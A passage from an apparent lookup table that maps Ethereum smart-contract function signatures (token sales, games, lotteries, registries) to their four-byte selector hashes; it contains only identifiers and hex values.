"EUROQUINNToken(uint256,string,string,uint256)": "0x50872e32", "GenesisToken(address,uint256)": "0xe70fe5e3", "getGameVars()": "0x8fe2b355", "updateBalance()": "0xa9559dd7", "setGame(uint256,uint256,uint256,uint256,uint256,uint256)": "0x9665688e", "Bet(uint256)": "0xba8cded7", "CoinFlip()": "0x51f3a7bd", "setRNGCallbackGasConfig(uint256,uint256)": "0xeb04df1d", "cleanupAbandonedGame(address)": "0x1a64937b", "transferBalance(address,uint256)": "0x56a6d9ef", "rollDie(address)": "0x2989ac22", "processDiceRoll(address,uint8)": "0x71c93fc7", "getHighWinPercent(uint256)": "0x0118251c", "getLowWinPercent(uint256)": "0x96577caa", "calculateWinnings(uint256,uint256)": "0x10c12917", "getMaxBet()": "0x646668b6", "getMinBet()": "0x24c37507", "getGameState(address)": "0xd9d60b52", "beginGame()": "0xda0b0682", "EtherHiLo()": "0x42c96767", "sendPrize(address[],uint256[],uint64)": "0xda0bba90", "setMaxPrizeOneDay(uint256)": "0x335aa61a", "clearNextPrizeTime()": "0x76db76f1", "PrizePool()": "0x0d7cffb0", "setFinance(address)": "0x9b8d3064", "setService(address)": "0xbf8bdac1", "liabilityFinalized(uint256)": "0xc9b94eb9", "createLighthouse(uint256,uint256,string)": "0x4d5b85f1", "createLiability(bytes,bytes)": "0xd2b962f2", "usedHashGuard(bytes32)": "0x8b148ef6", "winnerFromGas(uint256)": "0x5ec0c707", "quotaOf(address)": "0xef23b3a3", "EtherLotto()": "0x07f0973e", "MOBToken()": "0x8085de8b", "MOBTokenIssue(address)": "0xceba5029", "Chewbaka()": "0x2171526e", "balanceOfUnclaimedGoo(address)": "0x90a08e70", "Goo()": "0xb4c64ab0", "ASSPToken()": "0xc2c4abe6", "POWM()": "0xed3d4dc1", "PackageCoinPresaleOne(uint256,uint256)": "0x0b5608f2", "recover_unclaimed_bets()": "0x43cfd44c", "void_race()": "0x9f2f58ec", "end_race()": "0x28aa69cf", "setup_race(uint256,uint256)": "0xb6982c7f", "get_bet_nfo(uint256)": "0x7a8bd25a", "get_bettor_nfo()": "0x92b4b68a", "get_chronus()": "0xb1a1b3bc", "get_pool(uint256)": "0x07a67fb3", "bettor_reward(address)": "0x9bd4e13e", "check_reward()": "0x72acad56", "place_bet(uint8)": "0x4408f3f9", "DogRace()": "0x968fc02a", "Kubic()": "0x7b436460", "getCoinRemains()": "0x72ae74dd", "changeTribeOwner()": "0x710ffc72", "coinDrain()": "0xa4e6dd3a", "burner(uint256)": "0x11db8d1b", "Own()": "0xdc846d95", "firstThousandUsers()": "0x1598653d", "WorthlessEthereumTokens()": "0x10002f39", "transfer(address,address[],uint256[])": "0x72a503be", "NPSTToken(address)": "0x43722993", "convertToMiniUI(uint256)": "0x7d1d0553", "checkFundingCap()": "0xd89b908d", "checkFundingGoal()": "0xb3df27f4", "ownerUnlockFund()": "0x23ec8f62", "ownerSafeWithdrawal()": "0x782e34c9", "ownerAllocateTokens(address,uint256,uint256)": "0x28e08186", "UIWishSale(address,uint256,uint256,uint256,uint256,uint256,uint256,address,address)": "0xecda249b", "changeWebsite(string)": "0xb90291c3", "setCrowdsale(address,uint256)": "0x22ed6302", "UIWish(address)": "0x29e21cbd", "TicketGlobalChain(uint256,string,string)": "0x1dbf79a3", "createToken(string,string,uint8,uint256)": "0x210f5dda", "ERC20Token(string,string,uint8,uint256,address)": "0xe3964b8c", "checkStringLength(string,uint256,uint256)": "0xcb4a15c5", "stringToBytes10(string)": "0xd4b0c6e5", "ownerUpdateContractBalance(uint256)": "0x4025b5a8", "ownerSetCallbackGasPrice(uint256)": "0x126596e7", "playerCheckProvablyFair(uint256,bytes)": "0xf09c25e6", "Xflip()": "0xb28e5904", "getPercent(uint256,uint256)": "0x62219866", "CryptoRoboticsToken()": "0x0bdf3dae", "FuleexToken()": "0xfbf69367", "_generateShortLink()": "0x712f4d70", "getTextCount()": "0xf64e167e", "getDataFromCode(string)": "0xe29532c1", "getText(string)": "0x13f652fe", "archiveText(string)": "0x1c8a7795", "deployTokens(address[],uint256[])": "0x2e011136", "SwiftDex()": "0xc45e4a7b", "donateSkin(uint128[],address[],bool[],uint256[])": "0xbc2b6913", "setBleachDailyLimit(uint256)": "0x675a690c", "setTrCut(uint256)": "0xdba9a8a2", "_isNotOnSale(uint256)": "0xc2329e5f", "_isValidSkin(address,uint256,uint256)": "0x2704ead4", "_setCooldownEndTime(uint256,uint256)": "0x1a300a98", "_isNotMixing(uint256,uint256)": "0xcfaa234c", "_isCooldownReady(uint256,uint256)": "0xa0ab7091", "bleachAppearance(uint128,uint128)": "0x250312ce", "randomSkinAppearance(uint256)": "0x3d24081c", "calcNewSkinAppearance(uint128,uint128)": "0xa1c1519a", "transferP2P(uint256,address)": "0x6b7285d7", "SkinBase()": "0x07ddd6c9", "setCAO(address)": "0xbca3eb24", "demiseCEO(address)": "0xfde17733", "calculateVote(uint256,uint256,uint256)": "0xad2da239", "addNewAccount(string,address,uint256,uint256,uint256)": "0x35f6806b", "CreditMC()": "0x974238fd", "getMigrationAccount(address)": "0x17d48fc7", "getCurrentCreditsExchanged()": "0x7fdac6f1", "getCurrentDaoStakeSupply()": "0x8793ae52", "getCurrentDevReward()": "0xa8fa2fc6", "getCurrentSupplyVote()": "0x66bab099", "innerGreet()": "0xded1e7e3", "addProject(address)": "0x7c56b798", "addMetaProject(address)": "0x07e33107", "upgrade(address,address,address)": "0xf000999e", "PassDao()": "0x53ee9114", "ActualTokenManager()": "0xcbbe2199", "ActualShareManager()": "0xbe67f4fd", "MetaProject()": "0x7952a0ed", "ActualCommitteeRoom()": "0xe934ab0c", "ownerAddBankroll()": "0x31b29629", "playerGetPendingTxByAddress(address,address)": "0x27a93cce", "BettingKing()": "0x931e7daa", "setProvider(address)": "0xcfd8d6c0", "addGoal()": "0xf09a9b3c", "getGoals(address)": "0xcb8cb4a3", "resolveAddress(address)": "0xf81e8775", "resolveName(string)": "0xbc19bce5", "refundApprove(address,uint256)": "0x2b2c91b9", "burnToken(uint256)": "0x7b47ec1a", "addSupply(address,uint256)": "0xaa4f6012", "lookupSigName(address,address)": "0xab54775d", "lookupRegName(address)": "0x783c2088", "unSign(address,address)": "0xf82edc1b", "unRegOwn(address,string,address)": "0x2603ace6", "unRegister(address,string,address)": "0x94a82671", "setNotarius(address)": "0x60d9f0a8", "sign(address,address)": "0x9f7623b8", "Registrator()": "0x89301afc", "isSuperUser(address)": "0xcd784d1b", "enableUser(address,bool)": "0x42f57e4c", "enableManager(address,bool)": "0x34a991db", "enableSuperUser(address,bool)": "0xc14d3abe", "OriginalMyAccessControl()": "0x3ae983a8", "accountHasCurrentVote(address)": "0x8e4fa788", "hasAddressVotedInBallot(uint32,address)": "0xba9a4d6e", "vote(uint32,uint32)": "0xcff9293a", "isBallotSealed(uint32)": "0x108e161b", "hasBallotEnded(uint32)": "0x71aeae44", "isBallotInProgress(uint32)": "0x80c324cf", "adminSealBallot(uint32)": "0x2db78d88", "adminEditBallotOption(uint32,uint32,string)": "0x64445d9e", "adminAddBallotOption(uint32,string)": "0xa95bfd36", "adminAmendBallot(uint32,string,uint256,uint256)": "0xdda0c1d6", "adminAddBallot(string,uint256,uint256)": "0x62ec8e53", "administrator()": "0xf53d0a8e", "AICoin(uint256)": "0xb06f4d00", "addSkill(bytes32)": "0x94d2bdfe", "addJobSkill(uint32,bytes32)": "0xad7e74f9", "getSkillName(uint256)": "0x35595c95", "getJobTotalSkills(uint256)": "0xde9f28e4", "getJobWorkerName(uint256)": "0xaca6fdf2", "getJobEmployerName(uint256)": "0x6b55ddd0", "getJobValue(uint256)": "0x2b069816", "getJobStatus(uint256)": "0xa6c58b63", "getJobDescription(uint256)": "0xacb02504", "getJobName(uint256)": "0x6e7c1700", "getJobs()": "0x68581ebd", "newJob(bytes32,bytes32)": "0x2094e9d8", "newEmployer(bytes32)": "0xf2371fd1", "JobMarket()": "0xb817e043", "Shelter(string,string)": "0xc97cef81", "getCounts(address)": "0x5b467404", "getReceivedTrade(address,uint256)": "0x2f653279", "addReceivedTrade(address,bytes32)": "0x04ac3b80", "getSentTrade(address,uint256)": "0xecc72b0f", "addSentTrade(address,bytes32)": "0xb7c52820", "addFakeVisitors()": "0x60961955", "getVisitorCount()": "0x93cfd79f", "visit()": "0x0cc4330c", "VisitCount()": "0x59db5bac", "test02()": "0x671c7d68", "test01()": "0x1b18f952", "testTransferToken()": "0xb672b4d4", "testInitialTokenBalance()": "0x7da3e219", "quickChange(uint256,address[],uint256)": "0xee31bf00", "getQuickBuyEtherTokenAddress()": "0x07ac8087", "setQuickBuyPath(address[])": "0xd395ee0f", "_patternToNumber(bytes4)": "0x95a5418d", "findNextYear(uint256,bytes4)": "0xcf9057f7", "findNextMonth(uint256,bytes2)": "0x006ac4bf", "findNextDay(uint256,bytes2)": "0x6073660a", "findNextWeekday(uint256,bytes2)": "0x65243f87", "findNextHour(uint256,bytes2)": "0xe04c1830", "findNextMinute(uint256,bytes2)": "0xe0815ca9", "findNextSecond(uint256,bytes2)": "0xdbd3d021", "next(bytes2,bytes2,bytes2,bytes2,bytes2,bytes2,bytes4,uint256)": "0xd48bb321", "next(bytes2,bytes2,bytes2,bytes2,bytes2,bytes2,bytes2)": "0x2dbede89", "GuigsTokenSale(uint256,uint256,uint256,uint256,address,address,address,uint256)": "0x51656af5", "setTokenWallet(address)": "0xa621344a", "CashPokerProPreICO()": "0xdbe587b9", "isEASigned(uint32)": "0xb56537ef", "getEAAttributes(uint32)": "0xb44b0836", "isBuyFull()": "0x18896972", "ownerOfCountryCount(address)": "0xb5d86c86", "countryOwnersOf()": "0xf4635674", "winAddressOf()": "0xda6efb01", "countryLengthOf()": "0xfa66be4e", "battleCountOf()": "0x3e6075a4", "etherKing(uint256)": "0xc9b1b2ae", "UNITSimplePaymentGateway(address)": "0x16c27c4a", "CurrentToken()": "0xf9a381e2", "DNCEQUITY()": "0x81bb9470", "set_pauseReturn(bool)": "0xad0e9053", "set_pauseSale(bool)": "0xeec38cec", "CWS(uint256,string,string)": "0x730d2221", "LLV_311_EDIT_3()": "0x3387e52f", "addLockedAccount(address,uint256,uint256)": "0x81aa5067", "judgeEnableForTransfer(address,uint256)": "0x63fc98e3", "setInitLockedAccount()": "0xca555f2c", "MeetsOne()": "0x47c1303a", "Tile()": "0xe5a62ffc", "Weko()": "0x43e3e527", "getContribution(address,uint256)": "0x653c95b8", "included(address)": "0xc559743a", "PresalePool(uint256,uint256,uint256,address[])": "0xf5df1f1d", "sendTokenTeamAdvisor(address,address)": "0x4faca8f4", "setUnPauseEmergence()": "0xd7eae6db", "setPauseEmergence()": "0xc58684ab", "setIcoStage(uint256)": "0x3beb4db1", "changeParameters(uint256,uint8,uint256)": "0xc6b59e9e", "CPPGToken()": "0x5150e8ce", "withdrawalInterCrypto(string,string)": "0x358373bd", "withdrawalNormal()": "0x813e7847", "InterCrypto_Wallet()": "0x51be2361", "intercrypto_cancelConversion(uint256)": "0x720b43e8", "intercrypto_recoverable()": "0x9fce89a4", "intercrypto_recover()": "0xfa3c6320", "intercrypto_getInterCryptoPrice()": "0x260f836d", "intercrypto_convert(uint256,string,string,address)": "0x19ea809b", "intercrypto_convert(uint256,string,string)": "0xe609120a", "updateInterCryptonode(bytes32)": "0x91e23a4d", "updateInterCrypto()": "0x55274378", "updateResolver()": "0x708d0c57", "usingInterCrypto()": "0xa6178731", "recoverable(address)": "0x8dc4c6ab", "CTVToken(uint256,string,uint8,string)": "0x6a7c594e", "resolve()": "0x2810e1d6", "viewOwner()": "0xbc677b46", "shekel()": "0xa49d6be2", "initialDistribution()": "0x95645e34", "initialTransfer(address,uint256)": "0xeee392c8", "processInitialDistribution()": "0xe0dcf2d8", "totalTokensDistributed()": "0xd8f163ab", "importAddresses(address[],address[])": "0xc48e1c4d", "timereum()": "0x003ab1ff", "allocateCoins(address[],uint256[])": "0xf04e42cd", "SetLockAddress(address,bool)": "0xa57e768c", "SetAllLock(bool)": "0xf87aad3e", "_RamenCoin()": "0x32c7de60", "isFreezeAccount(address)": "0x6c169818", "Lira()": "0x60e11e16", "getPercentageAmount(uint256,uint256)": "0x09390af1", "getWithdrawableAmountPES(address)": "0x3ac46b25", "getWithdrawableAmountAS(address)": "0x7b253fe6", "startLockingPeriod()": "0x8f69fa25", "setEthExchangeWallet(address)": "0x998c4f5a", "setVLTMultiSig(address)": "0x75f46563", "addWalletAddresses(uint256,address)": "0x45bfdca6", "VLToken()": "0x17e72721", "CPLToken()": "0xb8d55a91", "transferTokens(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x71d7e4a9", "setTokenSaleDistribution(uint256)": "0xb120e1ef", "getAllowedAmount(uint256)": "0x14f7731b", "getValueToInvest()": "0x5897a1c6", "setEndSaleTime(uint256)": "0x6f68fffd", "setTokenSaleHalt(bool)": "0x8e1d9545", "AuctusTokenSale(uint256,uint256)": "0x7a1a0604", "NVCTToken()": "0xd261de38", "endThisContact()": "0x030eafa0", "clearLC()": "0x79ae9c5e", "buyLC()": "0x5bd9e637", "lockAccount()": "0x06e1976c", "Add_totalLotteryValue()": "0x707913f0", "buyLottery(uint8)": "0x642d63a3", "addHash(bytes32)": "0x43e08ad1", "balanceOfLockTime(address)": "0xe83ded8e", "balanceOfEth(address)": "0x40654e14", "GbeeStandardToken(uint256,string,uint8,string)": "0x078895ea", "MoonMinerToken(string,string,uint8,uint256)": "0x2d0cc13c", "SEPA()": "0x8282e1e4", "AEZtoken()": "0x7c6e5809", "MDC9Token(uint256,string,uint8,string)": "0x5495ca36", "DataShieldCoin(uint256,string,string)": "0x8e5ef4ea", "Leaderboard()": "0xa0f78572", "POMoooon()": "0x074c0836", "Aurum()": "0xe2df2472", "ICOBuyer(address,address,uint256,uint256)": "0xa526c826", "_0xBitcoinToken()": "0xeb665994", "seedMarket(uint256,uint256)": "0x23533138", "devFeeHandle(uint256)": "0xc38a0306", "buyEggs(uint256,address)": "0xbb3e409a", "checkUserWhiteList(address)": "0x2e08c3d1", "setPOOL_edit_9(string)": "0x9cf9d4c0", "getPOOL_edit_8()": "0x37dac676", "setPOOL_edit_8(string)": "0x3228556f", "getPOOL_edit_7()": "0x6f488063", "setPOOL_edit_7(string)": "0xf1fea32a", "getPOOL_edit_6()": "0x23b98f92", "setPOOL_edit_6(string)": "0x982270e7", "getPOOL_edit_5()": "0x3e8cee07", "setPOOL_edit_5(string)": "0x39c64f1b", "getPOOL_edit_4()": "0xf72d50a9", "setPOOL_edit_4(string)": "0x8703b7d8", "getPOOL_edit_3()": "0x48ab41d3", "setPOOL_edit_3(string)": "0x07113965", "getPOOL_edit_2()": "0xe7e96a43", "setPOOL_edit_2(string)": "0x9cd758d0", "getPOOL_edit_1()": "0xb929709a", "setPOOL_edit_1(string)": "0x5535cd2f", "POOL_EDIT_2()": "0x10769e01", "setPartnerETHRewardsPercent(uint256)": "0xaa25f57e", "A2ACrowdsalePartner()": "0xcde2e8d7", "withdrawToFounders(uint256)": "0xe37d4fed", "calculateRewards()": "0x3e50de30", "icoPartner(address,uint256)": "0xb89cd5bd", "ico(address,uint256)": "0xd4f2e67c", "setPartnerContracts(address)": "0xac13d9a6", "setBountyPercent(uint256)": "0x44bd7b71", "setBountyAddress(address)": "0xc659ce2b", "A2ACrowdsale()": "0xabe9717a", "isFailed()": "0xf4163340", "start(uint256,uint256,address)": "0xa51fe113", "mintTokenRewards(address,uint256)": "0xb23c1f19", "mintETHRewards(address,uint256)": "0x18c9ef97", "setICOaddr(address,bool)": "0x47e60236", "issueDuringICO(address,uint256)": "0x2c3dcdcf", "setVesting(address,uint256,uint256)": "0xe0a668b4", "A2AToken()": "0x308655b1", "CoinTel()": "0x41953e90", "UPEXCoin()": "0x0bd934c3", "Noblebit(uint256,uint256)": "0x35bd8b94", "_getPoS(address)": "0x53b93358", "_claimTokens(address)": "0x73069f94", "GDK()": "0x32121896", "BunzolaToken()": "0x56fc35d3", "DTXToken()": "0x0dae2a63", "buyWithCustomerIdWithChecksum(uint128,bytes1)": "0x63c6082f", "GTSToken()": "0x266716f6", "hashCoin()": "0xf45e29bb", "removeFromBlacklist(address)": "0x537df3b6", "buyWithKYCData(bytes,uint8,bytes32,bytes32)": "0xd7c7159c", "collectRefund()": "0x26ce3da0", "releaseTokens(uint256,uint256)": "0x3f4dd268", "refundParticipant(address,uint256,uint256,uint256,uint256)": "0x26654d57", "setTokenAgent()": "0xb0891f4f", "burnFoundersTokens(uint256,uint256)": "0x785fb499", "unsuccessfulWithdrawal()": "0x5edca2b4", "extendStart(uint256)": "0x7c6bd96d", "getStagePrice(uint8)": "0xfb0cf7ab", "getStageMinimum(uint8)": "0xbcdea6f9", "getStageCap(uint8)": "0x3c20d1a5", "getStageTokensSold(uint8)": "0x756a288e", "getStageDeadline(uint8)": "0x88426aec", "changePrice(uint8,uint256)": "0x91778b9c", "createStage(uint8,uint256,uint256,uint256,uint256)": "0x6fdd2ab4", "setStages()": "0xe6ca0f47", "setPreallocations()": "0x4413a688", "successfulWithdraw()": "0xbdd30406", "tokensToRecieve(uint256)": "0x4d95a7a2", "finalizeSale(uint256,uint256,uint128)": "0x4f895031", "produceTokens(address,uint256,uint256)": "0xbb945177", "buyTokens(uint128)": "0x0ced5b02", "hasHalted()": "0x46d73def", "reclaimAndBurn(address,uint256)": "0xfb920ad1", "reclaimAllAndBurn(address)": "0x2a724f2a", "setReleaseAgent()": "0x3e96d28e", "getKYCPayload(bytes)": "0x73752db4", "slice2(bytes,uint256)": "0x20956341", "slice4(bytes,uint256)": "0xd54dd8f9", "slice16(bytes,uint256)": "0x16419aa7", "sliceAddress(bytes,uint256)": "0xb655e138", "slice32(bytes,uint256)": "0x2e1eb7fe", "buscarDocumentoPorHash(bytes32)": "0x475e4c0f", "buscarDocumentoPorId(uint256)": "0xf174b333", "buscarDocumentoPorTitulo(bytes32)": "0x423252f9", "buscarDocumentoPorQM(string)": "0xf3ccc2f2", "guardarDocumento(string,bytes32,bytes32)": "0x0e56f529", "docStore()": "0x0c2d71b1", "determinePayout(uint8,uint8,uint8)": "0x956248aa", "getDial3Type(uint8)": "0xb6c6ecd3", "getDial2Type(uint8)": "0xab65cda6", "getDial1Type(uint8)": "0xec98618e", "play(uint8)": "0x53a04b05", "refund(bytes32)": "0x7249fbb6", "setMaxwin(uint16)": "0x8a1fde4b", "setMinBetPerTx(uint256)": "0x3119255c", "setMinBetPerSpin(uint256)": "0x150d6277", "setRefundsActive(bool)": "0xfb87eb0b", "setGamePaused(bool)": "0xb5c14adb", "setInitialGasForOraclize(uint256)": "0xfc0e64de", "setOraclizeQueryGasPrice(uint256)": "0x8aa19ef7", "setOraclizeQueryMaxTime(uint256)": "0x01f9a0aa", "genaroDevMultisig()": "0x150b6885", "TOKETH_PRESALE_ONE()": "0x938a465e", "maxFadeoutPromille()": "0x0204c163", "levelFourTokenNum()": "0xc9090c7f", "watchedAddress()": "0x96938d5b", "releaseTprFund()": "0x1073d1f8", "totalRaisedInCents()": "0xbc950708", "weiPerUSDinTGE()": "0xca256771", "creditGameAddress()": "0x9e416812", "getTokenTransferCount()": "0xfeaf0872", "RevokeBid()": "0x08054fd5", "feesProfitDeposit()": "0x09a71ffb", "NorthPoleAF()": "0xc076c847", "TOTAL_TOKENS_SUPPLY()": "0x6461ed00", "tier1LOT()": "0x4f96f446", "INITIAL_PRICE()": "0x7c5e2795", "kvtOwner()": "0x8140ce63", "UselessAirdroppedToken()": "0x96c16735", "EcosystemPart()": "0x5cfc6432", "dividendCycleTime()": "0xbfe9f204", "blinc()": "0xa2c93406", "crowdFunding()": "0xb6acabc1", "isAllocated3()": "0xa47c4d64", "walletPercentage()": "0x475c578c", "minCapWei()": "0xebc20426", "MAX_SINGLE_ISSUED_FROM_OTHER_CURRENCIES()": "0xf2491377", "MAX_LEVEL()": "0xa49062d4", "secondStageTotalSupply()": "0x66df8fe6", "maximumCap()": "0x1c42959c", "thirdBonusPercent()": "0xdcf1579c", "date01Oct2018()": "0x17453358", "TOKEN_PRIVATE_SALE_CAP()": "0x2a9d04f0", "ipoPlatform()": "0xe28b2b76", "numberOfStages()": "0xd13a73c4", "devRatio()": "0x11102d4d", "MAX_SUPPLY_NBTOKEN()": "0x0130371a", "MAX_POWERBALL_NUMBER()": "0xd910c805", "foundersTokensDisbursed()": "0xabfffa28", "MinedThisYear()": "0x1fc2e0fb", "icoEndDatetime()": "0x49ea33df", "targetWalletVerified()": "0x9278c418", "crowdsaleTokenPrice()": "0x3fc6d75a", "PrivateSaleDays()": "0x40af1a45", "startTransferToken()": "0x7d4d3128", "spankToken()": "0x92f4d225", "MIDGRADE_TYPE2()": "0xa22c81ec", "usdPerEthCoinmarketcapRate()": "0xcc976620", "exitWallet()": "0xeb5068f2", "endPeriodB()": "0x8b43234b", "ico4Min()": "0x8fe44adf", "sizeOfUserAddresses()": "0x6ac50f2f", "pauseTrading()": "0x1031e36e", "officialWebsite()": "0xbf3d9995", "minimumEtherAmount()": "0x82744368", "show_minimum_amount()": "0x3f4c89ca", "finanReserveAllocation()": "0xd22a1180", "periodITO_period()": "0xfb77269e", "angelInvestorsWallet()": "0xd9b158b1", "rewardSplitPercent()": "0x2a286a19", "market1()": "0xa42f1edb", "tokenWeiSold()": "0xf0ec03ae", "officialHold()": "0xf554e8cc", "genesisTimestamp()": "0xcacf66ab", "tokensPerCentsDayOne()": "0x4c7e6bab", "t_2nd_StageEnd()": "0xd33abd33", "SHARE_CRYSTAL()": "0x8ac01eaa", "noBonusTokenRecipients()": "0x84c019e3", "_originalBuyPrice()": "0x78f2144b", "controller2()": "0xbc13e3a6", "rewardAvailableCurrentDistribution()": "0x54292c53", "TEAM2()": "0xfd637f02", "totalEthContributed()": "0xcb282253", "lastweek_winner3()": "0x88ce3048", "coeRemainingAtCurrentRate()": "0xcc422cc2", "firstStageEnd()": "0xf5af6de6", "soldTokenInPresale()": "0x5257c2b3", "SCORE_REPORT_START_TIME()": "0xbd06e777", "_devFeesAddr()": "0x084794f8", "STARTING_CHICKEN()": "0xce4e84a3", "contributorsWallet()": "0xe259501e", "remunerationBalance()": "0x1b0762bb", "reservePR()": "0xbe73983a", "fiatRaisedConvertedToWei()": "0x914d581d", "totalFreezed()": "0xca4938fb", "oceanBonus()": "0x8c335b4b", "getCommissionBalanceWEIInfo()": "0xb372bd31", "privatePreSalePrice()": "0x46c9b457", "earlyBirdsAddress()": "0x9cc7d917", "artExplain()": "0x813d89e1", "durationPreSale()": "0xd53590a7", "endDateOfPreSale()": "0xfccf82a4", "TOKEN_DESK_BONUS()": "0xee737c12", "dnnToken()": "0xfa508d3e", "endICOStage8()": "0xd4821432", "totalInvestments()": "0x70fd37cf", "mgrCount()": "0xfb78f85c", "largestPenis()": "0x0b591195", "startEthToCentsRateUpdateCycle()": "0xbb7d715b", "privateOfferingTokens()": "0x03f21bda", "finalizeChangeInsurer()": "0xb2b95adc", "deposit2(address,address)": "0x69b9b787", "deposit4()": "0xbd0e5d07", "deposit3()": "0x43cd1638", "deposit2()": "0x539c0f14", "someFunction4()": "0x85439f82", "someFunction3()": "0xacddbe1c", "someFunction2()": "0x9ef45a31", "selleth(uint256)": "0xff92eb2c", "getprice()": "0x0fcb5984", "buytoken(address,uint256)": "0x4a768eaa", "myuseOf(address)": "0x55b09c58", "canuseOf(address)": "0xa1e15c33", "BlueHillMining()": "0x37e29e93", "PWGLToken(address,address)": "0x6de758a1", "BiSaiToken(address,uint256)": "0x597d5c6e", "distribute(address,address,address)": "0x01ed7f8b", "BitEyeToken()": "0x808f30f3", "record_human_readable_blockhash()": "0x3ed58536", "setExpiration(uint256)": "0x515a20ba", "removeRestriction()": "0x4830d5d9", "transferIsAllowed(address)": "0xbfd94c8c", "blockTransferFrom(address)": "0x48849c5a", "allowTransferFrom(address)": "0x8a74ee43", "transferPiece(uint256,address)": "0xe3677664", "signEscrow(uint256)": "0x7a1e16bc", "retrievePieceFromEscrow(uint256)": "0xf3db4f2b", "escrowTransfer(uint256,address)": "0xb8cb243d", "editTitle(uint256,string)": "0xf36fd108", "editMetadata(uint256,string)": "0x83219a8a", "editPieceData(uint256,string,string)": "0x2490e13f", "addPiece(string,string,bytes32,address)": "0x90785418", "addPieceAndHash(string,string,string,address)": "0x791455dd", "hasOwnership(uint256)": "0x047cfed9", "hashExists(bytes32)": "0xb535b5c3", "getPiece(uint256)": "0x6b45c9f2", "getNumPieces()": "0x7aa41ed5", "getEscrowData(uint256)": "0xae89aeb9", "getGrantBeneficiaries()": "0xef54801b", "releaseFor(address)": "0xec0904f7", "getGrantBalanceOf(address)": "0xd5de78bc", "getGrantBalance()": "0x09f9b3c5", "PolarisDEX(address,address,address,uint256,uint256,uint256)": "0xdab93a93", "NotFomo3D()": "0x537b9c93", "_multiMint(address[])": "0x60b35739", "_multiSet(address[],uint256[])": "0x2e3b3123", "getBonusPercentage()": "0x8222b7e9", "setFinish(uint256)": "0x2f558ba0", "setBonuses(uint256[])": "0x34bf97ea", "setRestricted(bool)": "0x24daddc5", "delist(address[])": "0x32cd0487", "list(address[])": "0x0266ba02", "reverse(address)": "0xe30bd740", "certify(uint256)": "0xc6634ef5", "complete(uint256,uint256)": "0xd6380f37", "getMyTokenBalance()": "0xa6b3abba", "handleSaleClaimCallback(address,uint256)": "0xbb57349c", "handleSaleCompletionCallback(uint256)": "0xf18ba98c", "transferAndCall(address,uint256)": "0x1296ee62", "setOtherPCK(address)": "0x0661b2f4", "updateTimer(uint256,uint256,uint256)": "0x7ce50441", "setEnforce(bool)": "0x489fde35", "setThreshold(uint256)": "0x960bfe04", "getRoundStatus()": "0x86b945b0", "refund(address,string,uint256,uint256,uint256)": "0x9459c254", "buy(address,string,uint256,uint256,uint256,uint256)": "0x9d1e0d48", "addInvestorIfNotExists(address)": "0xf2c70bda", "burn(address,uint256,uint256)": "0xf5298aca", "subOnStage(address,uint256,uint256)": "0x418ca0c7", "subOnStage(address,uint256)": "0xbcb593f1", "addOnStage(address,uint256,uint256)": "0xc418c93e", "addOnStage(address,uint256)": "0x2127fe90", "subOnOneStage(address,uint256,uint256)": "0x2ab2174e", "addOnOneStage(address,uint256,uint256)": "0x85bddb97", "canUseTokens(address,uint256)": "0xdf22bf83", "getHolderLimit(address)": "0xaf49e321", "setIsCheckStage(bool)": "0xa9147e22", "setStageCount(uint256)": "0xc1b664de", "StageVestingToken()": "0xaa065074", "SteveCoin()": "0xd47e813d", "setDefaultLockInDuration(uint256)": "0xf0b85b19", "updateCreditBalance(address,uint256,uint256)": "0x7c6fb59d", "withdrawStake(uint256,bytes)": "0xe625215c", "createStake(address,address,uint256,uint256,bytes)": "0x763ac589", "getPersonalStakeActualAmounts(address,address)": "0xa3b0bff4", "creditBalanceOf(address)": "0x32a92229", "spendCredits(address,uint256)": "0x2614d4a4", "stakeForDuration(address,uint256,uint256,bytes)": "0x6b2ce4ce", "SociBit()": "0x8581dc7c", "ganaBalance()": "0x2d7eba3f", "claimGanaTokens()": "0x92c6b697", "GanaTokenAirdropper(address)": "0x2b9be92e", "COTTToken()": "0x445d688b", "changeIcoAddress(address)": "0xded05da5", "changeDBAddress(address)": "0x34247b9b", "sendTokenTeamAdvisor(address)": "0xdf66fc14", "getFullround()": "0xe5a34f97", "luckyBuy()": "0x2b0d0180", "buyHeart(address)": "0x5984d7ad", "updateTimer(uint256)": "0xec54a36a", "getMyRevenue(uint256)": "0x313fc3fc", "changeTokenSettings(uint16,uint256,uint256)": "0x3aa5f4f7", "changeOperator(address)": "0x06394c9b", "changeMaxBet(uint256)": "0xae47a290", "calculateRandomNumberByBlockhash(uint256,address)": "0x8f4fb958", "calcRandomNumberAndGetPreliminaryGameResult(uint256,uint64)": "0xbd02e4f6", "ZeroDollarHomePage()": "0xbc8f3bcb", "YesNo(bytes32,address,string,address,uint256)": "0xe3ceb06d", "xnotify(string)": "0x648621ec", "XaurumToken(address)": "0x71f297cc", "XaurumProxyERC20()": "0xc1be4031", "XaurumDataContract()": "0x4f052648", "XaurmProxyContract()": "0xdb7ca38a", "X3()": "0x7266f4a4", "x15()": "0xc0a1a949", "WritedrawStatus()": "0x214c9d50", "workshop()": "0x720c4798", "WolframAlpha()": "0xd08275f1", "WLBDrawsDB()": "0x0d87a7c0", "WithFee(address,uint256)": "0x89790192", "withdrawWithReference(address,uint256,string)": "0xf359671c", "withdraw(uint256,address,uint256)": "0xe63697c8", "Withdraw(uint32)": "0x44faa139", "Withdraw(uint256)": "0x5b6b431d", "withdraw(uint256,address,string)": "0xf108a7d2", "withdrawRevenue()": "0x4f573cb2", "WithDrawPreForkChildDAO()": "0x770c6cbb", "withdrawPayments()": "0x6103d70b", "withdrawFundsRP()": "0xc7f86c37", "withdrawFundsAdvancedRP(address,uint256,uint256)": "0xceeafd9d", "withdrawFundsAdvanced(address,uint256,uint256)": "0xf4aa1291", "withdrawFunds()": "0x24600fc3", "withdrawEtherOrThrow(uint256)": "0x1dd4914b", "WithdrawCashForHardwareReturn(uint256)": "0x5f52e9fd", "withdrawAsset(uint256)": "0x8d92fdf3", "withdraw(address,uint256,bytes32,uint256)": "0x07bc6fad", "WithDraw()": "0x31e3e2fe", "WithBeneficiary(address)": "0x5ca3400c", "winningProtocal()": "0x95ceb4b3", "winningProposal()": "0x609ff1bd", "whois(string)": "0xd6d02c51", "whitelist(address)": "0x9b19251a", "whichChainIsThis()": "0x06e53f47", "WhatWasMyHash(bytes32)": "0x856f3080", "WeeklyLotteryB(address,uint256)": "0x836d6d66", "WeeklyLotteryB(address)": "0x05459f42", "WealthShare()": "0xbe0638e4", "WatchWinningPot()": "0x6b3a87d2", "WatchNumberOfPlayerInCurrentRound()": "0x4ef5710a", "WatchNextBlockReward()": "0xfb34fc6f", "WatchLastTime()": 